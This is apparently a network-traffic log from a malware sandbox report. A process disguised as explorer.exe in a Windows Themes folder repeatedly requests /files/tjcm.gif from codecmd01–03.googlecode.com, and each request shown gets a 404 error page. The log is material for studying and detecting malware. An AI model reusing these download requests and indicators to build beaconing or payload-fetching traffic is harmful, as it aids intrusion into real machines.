                                                                                                      Sep 30, 2024 16:16:12.940331936 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:13.655082941 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:13 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:13.655181885 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      114192.168.2.54982874.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:14.097192049 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:14.793392897 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:14 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:14.793920994 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      115192.168.2.549829108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:15.262361050 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:15.997685909 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:15 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:15.997720957 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      116192.168.2.549830108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:16.424850941 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:17.253767014 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:17 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:17.253794909 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:16:17.253806114 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                      Sep 30, 2024 16:16:17.482837915 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:17 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:17.484168053 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      117192.168.2.54983174.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:17.703262091 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:18.378590107 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:18 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:18.378613949 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      118192.168.2.549832108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:18.709419966 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:19.402837992 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:19 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:19.402868032 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      119192.168.2.549833108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:19.844458103 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
